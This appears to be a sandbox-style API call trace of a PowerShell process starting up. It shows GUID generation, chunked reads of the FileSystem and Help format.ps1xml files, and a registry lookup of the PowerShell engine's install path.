	[0585.915] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x4f1be08, Data2=0xfffb, Data3=0x472f, Data4=([0]=0x9d, [1]=0x28, [2]=0x19, [3]=0x99, [4]=0x6, [5]=0x57, [6]=0x38, [7]=0xba))) returned 0x0
	[0585.915] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x244bd74, Data2=0xc449, Data3=0x454e, Data4=([0]=0xb8, [1]=0x2e, [2]=0x38, [3]=0xb1, [4]=0xe3, [5]=0x76, [6]=0xa4, [7]=0xce))) returned 0x0
	[0585.916] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xc5b97508, Data2=0x8012, Data3=0x4ad6, Data4=([0]=0x8d, [1]=0xd9, [2]=0xa1, [3]=0xd5, [4]=0xb9, [5]=0xb5, [6]=0x1b, [7]=0x78))) returned 0x0
	[0585.916] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x617be965, Data2=0x6407, Data3=0x4490, Data4=([0]=0x80, [1]=0x37, [2]=0x6d, [3]=0x99, [4]=0x70, [5]=0xaf, [6]=0x4f, [7]=0x40))) returned 0x0
	[0585.916] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xb55f2cea, Data2=0xee61, Data3=0x48b9, Data4=([0]=0xb4, [1]=0xae, [2]=0x13, [3]=0xd6, [4]=0xd2, [5]=0xbe, [6]=0xb3, [7]=0xfc))) returned 0x0
	[0585.916] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x2f2c2c13, Data2=0x22a3, Data3=0x4ff6, Data4=([0]=0x97, [1]=0xcc, [2]=0x4d, [3]=0xb6, [4]=0xd3, [5]=0xc5, [6]=0x44, [7]=0x50))) returned 0x0
	[0585.916] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x425ae327, Data2=0xa9ca, Data3=0x4414, Data4=([0]=0x9f, [1]=0x7b, [2]=0x1c, [3]=0xd2, [4]=0xa7, [5]=0x67, [6]=0x7a, [7]=0x98))) returned 0x0
	[0585.916] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xa4633cda, Data2=0xb9eb, Data3=0x45f6, Data4=([0]=0x80, [1]=0xd5, [2]=0x12, [3]=0x4b, [4]=0x5, [5]=0x8f, [6]=0x47, [7]=0xfc))) returned 0x0
	[0585.917] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xf3b3898e, Data2=0x6aae, Data3=0x4502, Data4=([0]=0xb6, [1]=0x39, [2]=0x56, [3]=0x7f, [4]=0x2b, [5]=0xdf, [6]=0xef, [7]=0x33))) returned 0x0
	[0585.917] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0585.917] GetFileType (hFile=0x330) returned 0x1
	[0585.917] SetErrorMode (uMode=0x1) returned 0x1
	[0585.917] GetFileType (hFile=0x330) returned 0x1
	[0585.917] ReadFile (in: hFile=0x330, lpBuffer=0x3583210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3583210*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.582] ReadFile (in: hFile=0x330, lpBuffer=0x3583210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3583210*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.582] ReadFile (in: hFile=0x330, lpBuffer=0x3583210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3583210*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.582] ReadFile (in: hFile=0x330, lpBuffer=0x3583210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3583210*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.582] ReadFile (in: hFile=0x330, lpBuffer=0x3583210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3583210*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.583] ReadFile (in: hFile=0x330, lpBuffer=0x3583210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3583210*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.583] ReadFile (in: hFile=0x330, lpBuffer=0x3583210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3583210*, lpNumberOfBytesRead=0xcd138*=0x119, lpOverlapped=0x0) returned 1
	[0587.583] ReadFile (in: hFile=0x330, lpBuffer=0x3583210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3583210*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0587.583] CloseHandle (hObject=0x330) returned 1
	[0587.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0587.583] SetErrorMode (uMode=0x1) returned 0x1
	[0587.583] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0587.583] SetErrorMode (uMode=0x1) returned 0x1
	[0587.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0587.584] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x330) returned 0x0
	[0587.584] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd14c, lpData=0x0, lpcbData=0xcd148*=0x0 | out: lpType=0xcd14c*=0x1, lpData=0x0, lpcbData=0xcd148*=0x56) returned 0x0
	[0587.584] CoTaskMemAlloc (cb=0x5a) returned 0x345800
	[0587.584] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd11c, lpData=0x345800, lpcbData=0xcd118*=0x56 | out: lpType=0xcd11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd118*=0x56) returned 0x0
	[0587.584] CoTaskMemFree (pv=0x345800) 
	[0587.584] RegCloseKey (hKey=0x330) returned 0x0
	[0587.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0587.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0587.586] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x9e1580b0, Data2=0x6327, Data3=0x4af1, Data4=([0]=0x86, [1]=0x73, [2]=0x54, [3]=0xc4, [4]=0xe, [5]=0x46, [6]=0x69, [7]=0x8c))) returned 0x0
	[0587.586] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x25b54c2c, Data2=0x4fd, Data3=0x496d, Data4=([0]=0xb3, [1]=0xbc, [2]=0x7a, [3]=0x76, [4]=0x64, [5]=0x2b, [6]=0x90, [7]=0xc1))) returned 0x0
	[0587.586] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x39454669, Data2=0x62cf, Data3=0x45ab, Data4=([0]=0xb4, [1]=0x45, [2]=0x76, [3]=0x7d, [4]=0xc4, [5]=0x91, [6]=0xe1, [7]=0xb1))) returned 0x0
	[0587.586] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xc4af150b, Data2=0xa781, Data3=0x4641, Data4=([0]=0xb3, [1]=0x56, [2]=0x10, [3]=0xd6, [4]=0x5d, [5]=0x5e, [6]=0x37, [7]=0x47))) returned 0x0
	[0587.586] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0587.586] GetFileType (hFile=0x330) returned 0x1
	[0587.586] SetErrorMode (uMode=0x1) returned 0x1
	[0587.586] GetFileType (hFile=0x330) returned 0x1
	[0587.586] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.587] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.587] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.587] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.587] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.587] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.587] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.588] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.589] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.589] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.589] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.589] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.589] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.589] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.590] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.590] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.593] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.593] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.593] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.594] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.594] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.594] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.595] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.595] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.595] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.596] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.596] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.596] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.597] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.597] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.598] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.598] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.604] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.604] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.605] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.605] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.605] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.606] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.606] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.606] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.607] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.607] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.607] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.608] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.608] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.609] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.609] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.609] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.610] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.610] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.610] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.611] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.611] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.611] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0587.612] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0589.622] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0589.622] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0589.622] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0589.623] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0589.623] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0589.623] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0589.624] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0589.624] ReadFile (in: hFile=0x330, lpBuffer=0x35df3b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35df3b0*, lpNumberOfBytesRead=0xcd138*=0xf37, lpOverlapped=0x0) returned 1
	[0589.624] ReadFile (in: hFile=0x330, lpBuffer=0x35dea4f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x35dea4f*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
